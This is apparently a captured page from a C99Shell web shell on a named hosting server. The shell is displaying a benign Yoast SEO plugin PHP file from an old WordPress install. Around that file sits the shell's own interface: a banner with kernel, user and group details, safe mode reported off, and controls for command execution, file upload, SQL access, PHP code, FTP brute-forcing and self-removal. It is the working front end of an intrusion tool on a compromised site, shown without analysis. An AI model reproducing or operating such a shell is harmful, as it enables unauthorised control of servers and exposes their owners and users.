!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/   drwxr-xr-x
Free 180.07 GB of 490.84 GB (36.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-option-tabs-formatter.php (1.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin\Options\Tabs
 */

/**
 * Class WPSEO_Option_Tabs_Formatter
 */
class WPSEO_Option_Tabs_Formatter {

    
/**
     * @param WPSEO_Option_Tabs $option_tabs Option Tabs to get base from.
     * @param WPSEO_Option_Tab  $tab         Tab to get name from.
     *
     * @return string
     */
    
public function get_tab_viewWPSEO_Option_Tabs $option_tabsWPSEO_Option_Tab $tab ) {
        return 
WPSEO_PATH 'admin/views/tabs/' $option_tabs->get_base() . '/' $tab->get_name() . '.php';
    }

    
/**
     * @param WPSEO_Option_Tabs $option_tabs Option Tabs to get tabs from.
     * @param Yoast_Form        $yform       Yoast Form which is being used in the views.
     * @param array             $options     Options which are being used in the views.
     */
    
public function runWPSEO_Option_Tabs $option_tabsYoast_Form $yform$options = array() ) {

        echo 
'<h2 class="nav-tab-wrapper" id="wpseo-tabs">';
        foreach ( 
$option_tabs->get_tabs() as $tab ) {
            
printf'<a class="nav-tab" id="%1$s-tab" href="#top#%1$s">%2$s</a>'$tab->get_name(), $tab->get_label() );
        }
        echo 
'</h2>';

        foreach ( 
$option_tabs->get_tabs() as $tab ) {
            
// Prepare the help center for each tab.
            
$help_center = new WPSEO_Help_Center$option_tabs->get_base(), $tab );

            
$identifier $tab->get_name();
            
printf'<div id="%s" class="wpseotab">'$identifier );

            
// Output the help center.
            
$help_center->output_help_center();

            
// Output the settings view for all tabs.
            
$tab_view $this->get_tab_view$option_tabs$tab );
            if ( 
is_file$tab_view ) ) {
                require_once 
$tab_view;
            }

            echo 
'</div>';
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0223 ]--